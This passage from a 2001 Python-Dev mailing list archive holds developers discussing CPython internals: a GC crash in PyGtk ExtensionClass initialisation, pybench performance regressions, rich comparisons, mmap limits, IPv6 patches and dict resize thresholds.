PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) Well, for Extension Classes, PyType_Type is not correct either. And because ExtensionClass is loaded at runtime, we can't set the ob_type field in the initialiser even on Unix systems. > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. > > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. Thanks for debugging this problem Skip. If we don't find a correct solution to the problem, I can put the gc disable/enable calls inside the gtk/__init__.py module. James. From mal at lemburg.com Thu May 17 09:26:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:26:32 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B037D27.E258C363@lemburg.com> Tim Peters wrote: > > [MAL] > > Since it is possible that these figures result from my specific > > machine setup, I'd like to know what other people see on their > > machines. > > Is this the same machine where you were able to get 15% difference a few > years ago by adding or removing an unreachable printf in ceval.c (or was that > Vladimir)? If so, I bet it's degenerated to random 50% difference since then > . That must have been Valdimir's machine... even though I do admit that some small reordering changes do result in speedups of up to 10% -- probably due to the compiler accidentally creating code which the CPUs cache management likes. > My Win98SE box is *astonishingly* useless for timings. Without fail, the > first time I run pystone after a reboot yields a result a solid 50% higher > than the second or subsequent times I run it (yes, it's major-league *slower* > the second time). This is true across dozens of trials over several months, > and across all versions of Python. On Linux the situation is somewhat different; still I'm executing the tests 10-times each and for the figures I posted, I even ran pybench twice and only took the second readings as basis. > And simple little loops routinely vary in reported runtime by a factor of 3. > I may have to dig my old Win95 box out of the packing crate <0.6 wink>. > > None of that changes, of course, that the numbers you got are scary. Sure are... but I'm not so much interested in the absolute numbers -- it's the hot-spots which showed up that scare me: e.g. dictionary creation seems to have suffered along the way for some reason, functions calls are even slower now than they were previously and other important tasks such a instance creation take a similar hit (probably as a result of the other two). Running the same test for 2.1 vs. 2.0 there's not much to notice, so the important changes seem to be originating in the move from 1.5.2 to 2.0. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james at daa.com.au Thu May 17 09:33:17 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:33:17 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: On Thu, 17 May 2001, Fredrik Lundh wrote: > footnote: this is usually done in the module init function, *before* > the call to Py_InitModule. see: The PyExtensionClass_Export() function requires a pointer to the module dictionary so that it can add itself to the module. Unfortunately this requires that Py_InitModule to have been called before hand. I guess this means that the current ExtensionClass API will need to be modified in order to allow ExtensionClasses to be initialised before Py_InitModule. > > http://www.python.org/doc/FAQ.html#3.24 > > if the garbage collector can run after Python calls a module's init- > function, but before that module calls back into Python, anything > can happen... James. From mwh at python.net Thu May 17 09:43:38 2001 From: mwh at python.net (Michael Hudson) Date: 17 May 2001 08:43:38 +0100 Subject: [Python-Dev] Performance compares In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200" References: <3B037D27.E258C363@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Sure are... but I'm not so much interested in the absolute numbers > -- it's the hot-spots which showed up that scare me: e.g. dictionary > creation seems to have suffered along the way for some reason, > functions calls are even slower now than they were previously and > other important tasks such a instance creation take a similar hit > (probably as a result of the other two). Have you tried fiddling with gc parameters? If the GC does a multi generation trawl through the heap in the middle of some test, that might skew the numbers in unexpected ways. Or not, of course. Cheers, M. -- CLiki pages can be edited by anybody at any time. Imagine the most fearsomely comprehensive legal disclaimer you have ever seen, and double it -- http://ww.telent.net/cliki/index From mal at lemburg.com Thu May 17 11:03:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:03:06 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> Message-ID: <3B0393CA.7B0E024C@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Sure are... but I'm not so much interested in the absolute numbers > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > creation seems to have suffered along the way for some reason, > > functions calls are even slower now than they were previously and > > other important tasks such a instance creation take a similar hit > > (probably as a result of the other two). > > Have you tried fiddling with gc parameters? If the GC does a multi > generation trawl through the heap in the middle of some test, that > might skew the numbers in unexpected ways. > > Or not, of course. No, I haven't tried fiddling with those. I'm not sure I want to either ;-) ... the reason is that applications won't switch off GC for execution and so the tests is closer to real life. Still, I'll rerun the test suite using gc.disable() and post the results. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Thu May 17 11:18:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:18:36 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> <3B0393CA.7B0E024C@lemburg.com> Message-ID: <3B03976C.CF47961@lemburg.com> "M.-A. Lemburg" wrote: > > Michael Hudson wrote: > > > > "M.-A. Lemburg" writes: > > > > > Sure are... but I'm not so much interested in the absolute numbers > > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > > creation seems to have suffered along the way for some reason, > > > functions calls are even slower now than they were previously and > > > other important tasks such a instance creation take a similar hit > > > (probably as a result of the other two). > > > > Have you tried fiddling with gc parameters? If the GC does a multi > > generation trawl through the heap in the middle of some test, that > > might skew the numbers in unexpected ways. > > > > Or not, of course. > > No, I haven't tried fiddling with those. I'm not sure I want > to either ;-) ... the reason is that applications won't switch > off GC for execution and so the tests is closer to real life. > > Still, I'll rerun the test suite using gc.disable() and post the > results. Turns out, the difference is not noticable (< 1%). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gmcm at hypernet.com Thu May 17 15:00:27 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Thu, 17 May 2001 09:00:27 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B03932B.8219.CCBF9F3F@localhost> [Skip] > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > It would normally be the address of a type object (e.g. > &PyType_Type). However, Jim Fulton pointed out that on Windows > you can't get the address of &PyType_Type object at compile time. This is MS being passive-aggressive. If you tell MSVC the source is C++, it will magically find the address of PyType_Type at compile time, but their language lawyers apparently believe the C spec disallows this. Standards conformant and incompatible - what-MS-calls-"win-win"-ly y'rs - Gordon From guido at digicool.com Thu May 17 16:04:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 09:04:59 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200." <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> References: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. I have always thought that eventually (but long before Py3K!) all objects would only support rich comparisons and the __cmp__ and tp_compare slots would become completely obsolete. I realize I probably haven't expressed this thought clearly, and I'm not going to push for this to happen quickly or forecefully, but it's nevertheless how I see things. I expect it would allow a tremendous cleanup of the comparison code. It will never reach the simplicity of cmp() -- but think of Einstein's (?) rule "things should be as simple as they can be, but no simpler." Clearly cmp() was too simple. :-) Anyway, it worries me whenever I hear someone express the thought that adding rich comparisons to a particular object type would be a bad idea because it would slow things down. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 17 16:37:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:37:30 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT." <3B03932B.8219.CCBF9F3F@localhost> References: <3B03932B.8219.CCBF9F3F@localhost> Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com> > [Skip] > > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > > It would normally be the address of a type object (e.g. > > &PyType_Type). However, Jim Fulton pointed out that on Windows > > you can't get the address of &PyType_Type object at compile time. > > This is MS being passive-aggressive. If you tell MSVC the > source is C++, it will magically find the address of > PyType_Type at compile time, but their language lawyers > apparently believe the C spec disallows this. Standards > conformant and incompatible - > > what-MS-calls-"win-win"-ly y'rs > > - Gordon I don't think MS blames it on the language spec so much; it's probably more that they use the spec as an excuse not to fix their implementation. The problem only occurs when the definition of the symbol is in a different DLL than the reference. This is why built-in types like PyTuple_Type don't have this problem. I guess for C++ they have to do a dynamic initializer anyway, so they can make this work, but they haven't bothered to make it work for C. My other point is that Skip's problem is clearly a gtk bug: it shouldn't have exposed the type before fully initializing it. --Guido van Rossum (home page: http://www.python.org/~guido/) From james at daa.com.au Thu May 17 16:48:43 2001 From: james at daa.com.au (James Henstridge) Date: Thu, 17 May 2001 22:48:43 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com> Message-ID: On Thu, 17 May 2001, Guido van Rossum wrote: > My other point is that Skip's problem is clearly a gtk bug: it > shouldn't have exposed the type before fully initializing it. On further investigation, it turned out that it was caused by a bug in my code generator that caused one extension class to be initialised before its base class (in fact, that particular extension class shouldn't have had any base classes). It was just the cyclic GC code triggering the bug. It will be fixed in the next snapshot of pygtk for GTK+ 2.0 James. -- Email: james at daa.com.au WWW: http://www.daa.com.au/~james/ From guido at digicool.com Thu May 17 16:52:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:52:54 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800." References: Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com> > On further investigation, it turned out that it was caused by a bug in my > code generator that caused one extension class to be initialised before > its base class (in fact, that particular extension class shouldn't have > had any base classes). It was just the cyclic GC code triggering the bug. > > It will be fixed in the next snapshot of pygtk for GTK+ 2.0 Excellent news, James! I love the open source process! --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Thu May 17 17:04:50 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 17 May 2001 11:04:50 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <200105171452.f4HEqse09691@odiug.digicool.com> Message-ID: <15107.59538.421007.37251@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Excellent news, James! I love the open source process! No kidding! http://perens.com/Articles/StandTogether.html :) From Barrett at stsci.edu Thu May 17 16:56:49 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Thu, 17 May 2001 10:56:49 -0400 Subject: [Python-Dev] mmap module Message-ID: <3B03E6B1.A19F6594@STScI.Edu> In the CVS log of the mmapmodule.c, Tim Peters says: "The code really needs to be rethought from scratch (not by me, though ...)." Well, I might be the person to do the rethinking, but I'd first like to know what Tim has in mind. I've been playing around with this module lately and tend to agree that some enhancements could be made, particularly to prevent "bus errors" and "segmentation faults". The ability to have offsets into a file that are not multiples of the system pagesize would also be nice. I'd be willing to submit a PEP on a new mmapmodule, once I know what others would like. -- Paul -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From tim.one at home.com Thu May 17 18:02:38 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 12:02:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. I realize I > probably haven't expressed this thought clearly, and I'm not going to > push for this to happen quickly or forecefully, but it's nevertheless > how I see things. I expect it would allow a tremendous cleanup of the > comparison code. It will never reach the simplicity of cmp() -- but > think of Einstein's (?) rule "things should be as simple as they can > be, but no simpler." Clearly cmp() was too simple. :-) > > Anyway, it worries me whenever I hear someone express the thought that > adding rich comparisons to a particular object type would be a bad > idea because it would slow things down. At the moment, "almost all" comparisons in the dynamic sense have no need of richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple . For now richcmps are a tail-wagging-the-dog phenomenon, or more like the tail growing 10 pounds of dense matted hair, making the once-frisky puppy slow to a crawl because its butt is scraping the ground . Martin and I can resolve our differences wrt strings via getting rid of old strcmp entirely. Do you like the implications? 1. Code using cmp(string1, string2) will clearly run significantly slower, calling string comparison 1 (when == obtains), 2 (when < obtains), or 3 (when > obtains) times instead of always once only. Since == is the least likely outcome when using cmp() on strings (you can conclude that by instrumenting Python, or by common sense <0.5 wink>), the number of string compare calls more than doubles in practice for string cmp()-slinging programs (which includes existing well-written tree-based lookup schemes). 2. String dictionary lookup will, unlike the general non-dict case Martin instrumented, never pass the new "are the pointers the same?" richcmp Py_EQ test (because dict lookup already makes that test inline). So if old strcmp goes away, dict lookups that have to resort to strcmp will start paying for hopeless tests. OTOH, the "pointers equal?" test looks of dubious value for the non-dict string case anyway (where it succeeded only 1 in 20 times). #2 is a special case that can be special-cased to death, but #1 likely applies to code using cmp() for comparisons of objects of any type, and that's the primary reason I've resisted adding richcmps to the heavily-compared types (variously string, int, float, long, and type objects). Also the case that adding "a fast path" shouldn't have to endure wading thru multiple gimmicks (kinda defeats the idea of "fast" ), so the instant *one* heavily-compared basic type grows a richcmp (there are 0 such today), all should. So that's what I'll aim at. From guido at digicool.com Thu May 17 20:18:27 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 14:18:27 -0400 Subject: [Python-Dev] IPv6 Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com> What's out IPv6 story? I recall that someone once sent me patches, but they didn't work for me. Is it time to try again? In certain circles IPv6 support in Python would be enough to switch programming languages... :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Thu May 17 21:45:29 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 21:45:29 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> > 1. Code using cmp(string1, string2) will clearly run significantly > slower, calling string comparison 1 (when == obtains), 2 (when < > obtains), or 3 (when > obtains) times instead of always once only. I'd like to question the rationale behind this procedure. If a type has both tp_compare and tp_richcompare, and the application is performing cmp(o1, o2): Why is it then a good thing to emulate 3way compare using rich compare? I just changed the order in do_cmp, to the IMO more correct if (v->ob_type == w->ob_type && (f = v->ob_type->tp_compare) != NULL) return (*f)(v, w); c = try_rich_to_3way_compare(v, w); if (c < 2) return c; c = try_3way_compare(v, w); if (c < 2) return c; return default_3way_compare(v, w); With that, I got only a single failure in the test suite: test_userlist fails with exceptions.RuntimeError: UserList.__cmp__() is obsolete Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I agree. According to the CVS log, this implementation of do_cmp was installed in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific rationale for doing do_cmp in that order? Regards, Martin From tim at digicool.com Fri May 18 00:55:19 2001 From: tim at digicool.com (Tim Peters) Date: Thu, 17 May 2001 18:55:19 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) Message-ID: The worst percentage hit in both MAL's and Jeremy's pybench run was (here showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's ): DictCreation: 87.80 ms 2.93 us +115.72% Assorted things do not account for it: the new overhead of linking and unlinking dicts into the gc list (at creation and destruction times) seems to account for no more than 2%; and the overhead due to using the slower lookdict (as opposed to lookdict_string) even less. Jeremy cheated by running a profiler: the true cause is that dictresize gets called about twice as often. Before 2.1: *before* inserting an item, we checked to see whether the dict was at the resize point. If so, we resized it. Note that this meant PyDict_SetItem could grow a dict even if no new entry was made (and that this was the cause of several excruciating bugs in the 2.1 release cycle, since it meant a dict could get reshuffled merely when replacing the values associated with existing keys). 2.1: *after* inserting an item, and if the key was new (i.e., the dict grew a new entry, as opposed to just replacing the value associated with an existing key), and the dict is at the resize point, we resize it. Now the DictCreation test overwhelmingly creates dicts of size exactly 3. The dict resizes from empty to capacity 4 on the way to gaining 2 entries. When adding the third: Before 2.1: 2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up remaining a capacity-4 dict with 3 slots full. This actually violates a documented dict invariant (i.e., that dicts are never more than 2/3rd full). 2.1: The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we *do* resize it, and the dict ends up with 3 of 8 slots full. I've got no interest in trying to restore the old behavior. A compromise may be to boost the minimum size of a non-empty dict from 4 to 8. As is, the only non-empty dicts that can get away with using the current minimum size of 4 have no more than 2 elements. The question is whether such tiny non-empty dicts are common enough to make everyone else pay for "an extra" resize. go-ahead-just-*try*-to-prove-your-answer-ly y'rs - tim From skip at pobox.com Fri May 18 01:21:50 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 18:21:50 -0500 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <15108.23822.538016.564151@beluga.mojam.com> Guido> In certain circles IPv6 support in Python would be enough to Guido> switch programming languages... :-) Sounds like someone has caught the scent of world domination... ;-) S From jeremy at digicool.com Thu May 17 20:39:07 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 14:39:07 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.6859.810306.811326@slothrop.digicool.com> Another option is to change the benchmark to put one more item in the dict. Then the same number of resizes would occur with both versions of Python. Jeremy From tim.one at home.com Fri May 18 02:08:13 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:08:13 -0400 Subject: [Python-Dev] mmap module In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu> Message-ID: [Paul Barrett] > In the CVS log of the mmapmodule.c, Tim Peters says: > > "The code really needs to be rethought from scratch (not by me, though > ...)." That was in specific reference to the code I changed, in mmap_find_method. The difficulty is that mmap is great for "large files", but the code before my change used a C int for the starting offset and also for the return value; I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 bytes). The mmap_object struct uses size_t to declare the relevant members, which is possibly better still than C long, but may still leave platform capabilities out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit offsets when creating a mapped file view). C is a friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range of C integral types anyway. In other words, if this code is ever to reach its full potential, it "really needs to be rethought from scratch". > Well, I might be the person to do the rethinking, but I'd first like > to know what Tim has in mind. Nothing that you did . > I've been playing around with this module lately and tend to agree > that some enhancements could be made, particularly to prevent "bus > errors" and "segmentation faults". When you get one of those, it's a bug in Python! > The ability to have offsets into a file that are not multiples of the > system pagesize would also be nice. It's OS-specific. Python should grow warts to protect against it on the OSes that care. > I'd be willing to submit a PEP on a new mmapmodule, once I know what > others would like. Hard to say. This has the potential to become Python's next thread subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If you do write a PEP, I vote to say that we'll cover Windows and Linux (and maybe Mac OS X?) out of the box, but any other platform is at your own risk (it doesn't really help if somebody pops up volunteering to support a minority platform, because they eventually go away, their code stops working, and it never gets fixed -- so it's use-at-your-own-risk in reality regardless). From tim.one at home.com Fri May 18 02:29:18 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:29:18 -0400 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: [Guido van Rossum] > What's out IPv6 story? Ah! If that's version 6 of the Integer-Point alternative to Floating-Point, I've got it covered. Otherwise my guess is we have no story at all. > I recall that someone once sent me patches, but they didn't work for me. Try recompiling with -DLONG_BIT=33. > Is it time to try again? In certain circles IPv6 support in Python > would be enough to switch programming languages... :-) Floating-point is *that* bad?! ever-helpful-ly y'rs - tim From jeremy at digicool.com Fri May 18 00:16:15 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 18:16:15 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.19887.534514.864376@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> I've got no interest in trying to restore the old behavior. A TP> compromise may be to boost the minimum size of a non-empty dict TP> from 4 to 8. As is, the only non-empty dicts that can get away TP> with using the current minimum size of 4 have no more than 2 TP> elements. The question is whether such tiny non-empty dicts are TP> common enough to make everyone else pay for "an extra" resize. I also did a profile run on CreateInstances, which has a difference of +55.54% on my machine. It's basically the same story. The instance dictionary is getting resized more often with Python 2.1+ than it did with Python 1.5.2. I wouldn't be surprised if several more tests are showing a slowdown with the same cause. So boosting the minimum size sounds like a good thing. Jeremy From tim.one at home.com Fri May 18 05:26:52 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 23:26:52 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff> Message-ID: [/F] > more info here: > > http://home.rica.net/alphae/419coal/index.htm > > "A Five Billion US$ (as of 1996, much more now) worldwide > Scam which has run since the early 1980's under Successive > Governments of Nigeria. > > "The Nigerian Scam is, according to published reports, the > Third to Fifth largest industry in Nigeria." Most interesting to me is that US Post Office is upset about this: http://www.usps.gov/websites/depart/inspect/pressrel.htm They don't seem to care so much that people are getting scammed, but that the letters mailed from Nigeria to advance the fee-extorting phase of the scam often use counterfeit postage! Where else but here http://www.usps.gov/websites/depart/inspect/metercap.htm could you learn that "Postage meters are not used in Nigeria -? therefore, all postage meter impressions on Nigerian mail are counterfeit!"? governments-are-mostly-insane-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Fri May 18 06:45:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 18 May 2001 06:45:21 +0200 Subject: [Python-Dev] IPv6 References: Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de> > What's out IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) It's still on SF, http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470 There are two problems with that patch, AFAICT: 1. It is too large for any individual to review in one chunk. 2. It gets quickly outdated. 3. It touches core aspects of the socket handling that are IMO better untouched. I don't know whether the generalization proposed there is necessary to support IPv6 reasonably - the author certainly feels it is. To integrate the patch, I would propose to split it into smaller parts, and submit and review them one-by-one. The first patch should deal only with autoconf stuff, so that the proper #defines are in config.h (although they would not be used right away). The second patch should be a tar file of all new files (the patch on SF actually misses some files). The third patch should include changes to the C modules, and the last one changes to the standard library modules. For that procedure to work, we need cooperation from the submitter. For that, we probably need to indicate that we are really interested in his work, and will work with him to integrate it into Python. So far, his impression must be that nobody is interested - the patch is sitting there since 2000-08-16, making it the oldes open patch. Undoubtedly, integrating this piece of work will result in various problems with Python CVS: it won't build anymore on "funny machines" (like Windows), and it might even crash on code that used to work just fine. This prediction is not based on the actual content of the patch, merely on its size, and the fact that IPv6 support is experimental on many systems. So we'ld also need a BDFL pronouncement that we really really want this, and that anybody running into problems should either help fixing them, or stay away from CVS while it is being integrated. Regards, Martin From tim at digicool.com Fri May 18 09:17:07 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 03:17:07 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: [Jeremy] > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. I don't know. PyBench is great for showing that *something* changed, but it's got even less claim to "typical use" than pystone. I don't know that the test suite is better in that respect, but it's got much more variety and everyone has it . I stuffed code in dict_dealloc() to record the ma_fill of each dict on its way to the grave (ma_fill == number of non-virgin slots). Across the test suite, here's the ranking, from most to least popular fill: count fill %total cumulative % ------ ---- ------ ------------ 146321 1 53.30 53.30 38200 0 13.91 67.21 32616 2 11.88 79.09 29648 3 10.80 89.89 9884 5 3.60 93.49 5423 4 1.98 95.47 2428 6 0.88 96.35 2016 8 0.73 97.08 1179 7 0.43 97.51 904 9 0.33 97.84 709 103 0.26 98.10 554 10 0.20 98.30 513 13 0.19 98.49 459 12 0.17 98.66 447 11 0.16 98.82 364 14 0.13 98.95 233 15 0.08 99.04 231 16 0.08 99.12 193 18 0.07 99.19 180 17 0.07 99.26 122 19 0.04 99.30 107 30 0.04 99.34 105 21 0.04 99.38 93 22 0.03 99.41 93 20 0.03 99.45 86 256 0.03 99.48 82 23 0.03 99.51 80 26 0.03 99.54 74 24 0.03 99.56 69 27 0.03 99.59 64 25 0.02 99.61 60 29 0.02 99.63 49 28 0.02 99.65 44 34 0.02 99.67 33 32 0.01 99.68 28 31 0.01 99.69 27 37 0.01 99.70 27 33 0.01 99.71 26 35 0.01 99.72 24 36 0.01 99.73 23 39 0.01 99.74 23 38 0.01 99.75 21 128 0.01 99.75 19 44 0.01 99.76 19 40 0.01 99.77 17 46 0.01 99.77 16 48 0.01 99.78 15 47 0.01 99.78 14 50 0.01 99.79 14 42 0.01 99.79 There are many more sizes, but I cut off the display here when they got too rare to round to 1% of 1% of the total count. Boosting the first non-empty size to 8 would allow 93+% of all dicts to get away with at most one resize (a dict of size 8 is enough for a fill of 5, but not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are alive *at the same time*, it would be quite a waste of space to force the non-empty ones to carry 8 slots. OTOH, if those small dicts are due to things like building one- or two-element keyword argument dicts, their lifetimes rarely overlap. A more aggressive idea is to allow denser dicts, by allowing them to become no more than 75% full. That is, change the resize test from mp->ma_fill*3 >= mp->ma_size*2 to mp->ma_fill*4 > mp->ma_size*3 That would allow the 10.8% of real(er) life dicts with fill 3 to continue living in dicts with 4 slots, and allow about 90% of all dicts to get away with no more than one resize. The downside is that boosting the max load factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, a small boost in the expected # of compares. But the "theory" is for random hash functions with "uniform probing" (tech term that does *not* mean linear probing), and Python's hash functions often aren't random at all, while AFAIK no rigorous analysis of its probing strategy exists. So, plenty of arbitrary data there upon which to flip a coin . From mal at lemburg.com Fri May 18 09:26:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 09:26:36 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: <3B04CEAC.57251CD7@lemburg.com> Jeremy Hylton wrote: > > >>>>> "TP" == Tim Peters writes: > > TP> I've got no interest in trying to restore the old behavior. A > TP> compromise may be to boost the minimum size of a non-empty dict > TP> from 4 to 8. As is, the only non-empty dicts that can get away > TP> with using the current minimum size of 4 have no more than 2 > TP> elements. The question is whether such tiny non-empty dicts are > TP> common enough to make everyone else pay for "an extra" resize. > > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. FYI, I have a patch which inlines small dictionaries directly into the type object (rather than usin malloc to allocate the slot buffer). I've experimented with the minimal size a lot and found that setting it to 8 slots gives the bext performance/memory tradeoff. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim at digicool.com Fri May 18 10:32:39 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 04:32:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com> Message-ID: [MAL] > FYI, I have a patch which inlines small dictionaries directly > into the type object You don't mean that, but how about uploading the patch to SF anyway? Assign it to me and I'll dig into it. > ... > I've experimented with the minimal size a lot and found that > setting it to 8 slots gives the bext performance/memory tradeoff. Having done just a couple rounds of instrumented runs across various apps, I was moving to that conclusion too. Also that "small" dicts are so common that avoiding the "extra" malloc would be a nice win for them, and that large dicts are rare enough and resizing expensive enough anyway that the new cost of doing a two-headed allocation strategy would be lost in the noise. IOW, I'm inclined to believe that everything you say your patch does is Good For Python, and 